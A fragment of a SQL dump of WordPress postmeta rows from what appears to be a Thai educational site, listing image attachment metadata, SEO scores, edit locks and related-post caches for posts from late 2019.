(14319, 6134, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/09/180962-01-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180962-01-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180962-01-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"180962-01-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"180962-01-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180962-01-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14320, 6119, '_thumbnail_id', '6134'),
(14324, 6119, '_hide_featured', NULL),
(14325, 6119, '_yoast_wpseo_content_score', '30'),
(14326, 6119, '_yoast_wpseo_primary_category', '31'),
(14327, 6119, '_wpas_done_all', '1'),
(14330, 6136, '_edit_lock', '1568782931:14'),
(14331, 6136, '_edit_last', '14'),
(14332, 6136, '_thumbnail_id', '6133'),
(14336, 6136, '_hide_featured', NULL),
(14337, 6136, '_yoast_wpseo_content_score', '60'),
(14338, 6136, '_yoast_wpseo_primary_category', '31'),
(14339, 6136, '_wpas_done_all', '1'),
(14342, 6138, '_edit_lock', '1568783029:14'),
(14343, 6138, '_edit_last', '14'),
(14344, 6139, '_wp_attached_file', '2019/09/180962-03-1.jpg'),
(14345, 6139, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/09/180962-03-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180962-03-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180962-03-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"180962-03-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"180962-03-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180962-03-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14346, 6138, '_thumbnail_id', '6139'),
(14350, 6138, '_hide_featured', NULL),
(14351, 6138, '_yoast_wpseo_content_score', '60'),
(14352, 6138, '_yoast_wpseo_primary_category', '31'),
(14353, 6138, '_wpas_done_all', '1'),
(14356, 6141, '_edit_lock', '1568783123:14'),
(14357, 6141, '_edit_last', '14'),
(14358, 6141, '_thumbnail_id', '6128'),
(14362, 6141, '_hide_featured', NULL),
(14363, 6141, '_yoast_wpseo_content_score', '60'),
(14364, 6141, '_yoast_wpseo_primary_category', '31'),
(14365, 6141, '_wpas_done_all', '1'),
(14368, 6143, '_edit_lock', '1568783204:14'),
(14369, 6143, '_edit_last', '14'),
(14370, 6143, '_thumbnail_id', '6131'),
(14374, 6143, '_hide_featured', NULL),
(14375, 6143, '_yoast_wpseo_content_score', '60'),
(14376, 6143, '_yoast_wpseo_primary_category', '31'),
(14377, 6143, '_wpas_done_all', '1'),
(14380, 6145, '_edit_lock', '1568783292:14'),
(14381, 6145, '_edit_last', '14'),
(14382, 6145, '_thumbnail_id', '6127'),
(14386, 6145, '_hide_featured', NULL),
(14387, 6145, '_yoast_wpseo_content_score', '60'),
(14388, 6145, '_yoast_wpseo_primary_category', '31'),
(14389, 6145, '_wpas_done_all', '1'),
(14390, 6147, '_edit_lock', '1568783407:14'),
(14391, 6147, '_edit_last', '14'),
(14392, 6148, '_wp_attached_file', '2019/09/180962-07-1.jpg'),
(14393, 6148, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/09/180962-07-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180962-07-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180962-07-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"180962-07-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"180962-07-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180962-07-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14394, 6147, '_thumbnail_id', '6148'),
(14398, 6147, '_hide_featured', NULL),
(14399, 6147, '_yoast_wpseo_content_score', '60'),
(14400, 6147, '_yoast_wpseo_primary_category', '31'),
(14401, 6147, '_wpas_done_all', '1'),
(14402, 6150, '_edit_lock', '1568783498:14'),
(14403, 6150, '_edit_last', '14'),
(14404, 6150, '_thumbnail_id', '6125'),
(14408, 6150, '_hide_featured', NULL),
(14409, 6150, '_yoast_wpseo_content_score', '60'),
(14410, 6150, '_yoast_wpseo_primary_category', '31'),
(14411, 6150, '_wpas_done_all', '1'),
(14412, 6152, '_edit_lock', '1568783595:14'),
(14413, 6152, '_edit_last', '14'),
(14414, 6152, '_thumbnail_id', '6124'),
(14418, 6152, '_hide_featured', NULL),
(14419, 6152, '_yoast_wpseo_content_score', '60'),
(14420, 6152, '_yoast_wpseo_primary_category', '31'),
(14421, 6152, '_wpas_done_all', '1'),
(14424, 6154, '_edit_lock', '1568783674:14'),
(14425, 6154, '_edit_last', '14'),
(14426, 6154, '_thumbnail_id', '6123'),
(14430, 6154, '_hide_featured', NULL),
(14431, 6154, '_yoast_wpseo_content_score', '60'),
(14432, 6154, '_yoast_wpseo_primary_category', '31'),
(14433, 6154, '_wpas_done_all', '1'),
(14436, 6156, '_edit_lock', '1568783755:14'),
(14437, 6156, '_edit_last', '14'),
(14438, 6156, '_thumbnail_id', '6122'),
(14442, 6156, '_hide_featured', NULL),
(14443, 6156, '_yoast_wpseo_content_score', '60'),
(14444, 6156, '_yoast_wpseo_primary_category', '31'),
(14445, 6156, '_wpas_done_all', '1'),
(14448, 6158, '_edit_lock', '1568783920:14'),
(14449, 6158, '_edit_last', '14'),
(14450, 6159, '_wp_attached_file', '2019/09/180962-12-1.jpg'),
(14451, 6159, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2019/09/180962-12-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"180962-12-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"180962-12-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"180962-12-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"180962-12-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"180962-12-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14452, 6158, '_thumbnail_id', '6159'),
(14456, 6158, '_hide_featured', NULL),
(14457, 6158, '_yoast_wpseo_content_score', '60'),
(14458, 6158, '_yoast_wpseo_primary_category', '31'),
(14459, 6158, '_wpas_done_all', '1'),
(14462, 6161, '_edit_lock', '1568784133:14'),
(14463, 6161, '_edit_last', '14'),
(14464, 6161, '_thumbnail_id', '6130'),
(14468, 6161, '_hide_featured', NULL),
(14469, 6161, '_yoast_wpseo_content_score', '60'),
(14470, 6161, '_yoast_wpseo_primary_category', '31'),
(14471, 6161, '_wpas_done_all', '1'),
(14472, 6152, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575580139;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4967;}i:1;a:1:{s:2:\"id\";i:6147;}i:2;a:1:{s:2:\"id\";i:6308;}}}}'),
(14475, 6163, '_edit_lock', '1568784091:14'),
(14476, 6163, '_edit_last', '14'),
(14477, 6147, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575059968;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6138;}i:1;a:1:{s:2:\"id\";i:6136;}i:2;a:1:{s:2:\"id\";i:6054;}}}}'),
(14478, 6163, '_thumbnail_id', '6121'),
(14482, 6163, '_hide_featured', NULL),
(14483, 6163, '_yoast_wpseo_content_score', '60'),
(14484, 6163, '_yoast_wpseo_primary_category', '31'),
(14485, 6163, '_wpas_done_all', '1'),
(14486, 6143, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575477815;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6145;}i:1;a:1:{s:2:\"id\";i:5760;}i:2;a:1:{s:2:\"id\";i:4704;}}}}'),
(14489, 6138, '_jetpack_related_posts_cache', 'a:1:{s:32:\"07b388e17831be36b292388dbaafb93d\";a:2:{s:7:\"expires\";i:1575662330;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6136;}i:1;a:1:{s:2:\"id\";i:5378;}i:2;a:1:{s:2:\"id\";i:4726;}}}}'),
(14490, 6150, '_jetpack_related_posts_cache', 'a:1:{s:32:\"72b590901912c74d1abeadc034162430\";a:2:{s:7:\"expires\";i:1575662505;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:5141;}i:2;a:1:{s:2:\"id\";i:6063;}}}}'),
(14491, 6156, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575736681;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4098;}i:1;a:1:{s:2:\"id\";i:6074;}i:2;a:1:{s:2:\"id\";i:3961;}}}}'),
(14492, 6145, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575642112;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6143;}i:1;a:1:{s:2:\"id\";i:5760;}i:2;a:1:{s:2:\"id\";i:5865;}}}}'),
(14493, 6136, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1573643349;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6138;}i:1;a:1:{s:2:\"id\";i:5378;}i:2;a:1:{s:2:\"id\";i:4726;}}}}'),
(14494, 6154, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575713400;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6138;}i:1;a:1:{s:2:\"id\";i:6136;}i:2;a:1:{s:2:\"id\";i:4951;}}}}'),
(14495, 6141, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1572089798;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6152;}i:1;a:1:{s:2:\"id\";i:5200;}i:2;a:1:{s:2:\"id\";i:5147;}}}}'),
(14496, 6158, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575657115;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6054;}i:1;a:1:{s:2:\"id\";i:5926;}i:2;a:1:{s:2:\"id\";i:6147;}}}}'),
(14497, 6161, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575705802;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3979;}i:1;a:1:{s:2:\"id\";i:5945;}i:2;a:1:{s:2:\"id\";i:4026;}}}}'),
(14498, 6119, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575082688;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6158;}i:1;a:1:{s:2:\"id\";i:6147;}i:2;a:1:{s:2:\"id\";i:6063;}}}}'),
(14499, 6163, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575742617;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5917;}i:1;a:1:{s:2:\"id\";i:6014;}i:2;a:1:{s:2:\"id\";i:5991;}}}}'),
(14500, 6165, '_wp_attached_file', '2019/09/คู่มือการใช้งาน-v.pdf'),
(14509, 6168, '_wp_attached_file', '2019/09/Untitled-1.jpg'),
(14510, 6168, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:1772;s:4:\"file\";s:22:\"2019/09/Untitled-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-300x152.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-1-768x388.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:388;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-1-1024x517.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-400x202.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14516, 6173, '_edit_lock', '1568947973:14'),
(14517, 6173, '_edit_last', '14'),
(14518, 6174, '_wp_attached_file', '2019/09/200962.jpg'),
(14519, 6174, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:673;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2019/09/200962.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"200962-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"200962-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"200962-210x300.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14523, 6173, '_hide_featured', NULL),
(14524, 6173, '_yoast_wpseo_content_score', '30'),
(14525, 6173, '_yoast_wpseo_primary_category', '3'),
(14526, 6173, '_wpas_done_all', '1'),
(14529, 6176, '_edit_lock', '1568949188:14'),
(14530, 6176, '_edit_last', '14'),
(14531, 6177, '_wp_attached_file', '2019/09/209062-.jpg'),
(14532, 6177, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:19:\"2019/09/209062-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"209062--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"209062--300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"209062--768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"209062--1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"209062--400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14533, 6176, '_thumbnail_id', '6177'),
(14537, 6176, '_hide_featured', NULL),
(14538, 6176, '_yoast_wpseo_content_score', '60'),
(14539, 6176, '_yoast_wpseo_primary_category', '31'),
(14540, 6176, '_wpas_done_all', '1'),
(14543, 6173, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575417301;s:7:\"payload\";a:0:{}}}'),
(14544, 6176, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575439048;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5141;}i:1;a:1:{s:2:\"id\";i:6152;}i:2;a:1:{s:2:\"id\";i:4098;}}}}'),
(14547, 6182, '_edit_lock', '1629446484:12'),
(14548, 6182, '_edit_last', '14'),
(14549, 6182, '_hide_featured', NULL),
(14555, 6182, 'popup_theme_defaults_set', 'true'),
(14556, 6182, '_pum_user_modified', '1'),
(14557, 6189, '_edit_lock', '1572572308:14'),
(14558, 6189, '_edit_last', '14'),
(14559, 6190, '_wp_attached_file', '2019/09/ตารางเวร-เดือน-ต.ค.-.pdf'),
(14563, 6189, '_hide_featured', NULL),
(14564, 6189, '_yoast_wpseo_content_score', '60'),
(14565, 6189, '_yoast_wpseo_primary_category', '3'),
(14566, 6189, '_wpas_done_all', '1'),
(14569, 6189, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575493489;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6008;}i:1;a:1:{s:2:\"id\";i:5906;}i:2;a:1:{s:2:\"id\";i:6259;}}}}'),
(14574, 6194, '_wp_attached_file', '2019/10/ประกาศลงทะเบียน-เทอม-2.png'),
(14575, 6194, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:72:\"2019/10/ประกาศลงทะเบียน-เทอม-2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:72:\"ประกาศลงทะเบียน-เทอม-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:72:\"ประกาศลงทะเบียน-เทอม-2-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:72:\"ประกาศลงทะเบียน-เทอม-2-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:72:\"ประกาศลงทะเบียน-เทอม-2-400x267.png\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14576, 6195, '_wp_attached_file', '2019/10/ประกาศลงทะเบียน-เทอม-2-1.png'),
(14577, 6195, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:74:\"2019/10/ประกาศลงทะเบียน-เทอม-2-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-1-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-1-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-1-400x267.png\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14578, 6196, '_wp_attached_file', '2019/10/ประกาศลงทะเบียน-เทอม-2-2.png'),
(14579, 6196, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:74:\"2019/10/ประกาศลงทะเบียน-เทอม-2-2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-2-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-2-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:74:\"ประกาศลงทะเบียน-เทอม-2-2-400x267.png\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14585, 6200, '_wp_attached_file', '2019/10/10-1-2562-9-00-17.png'),
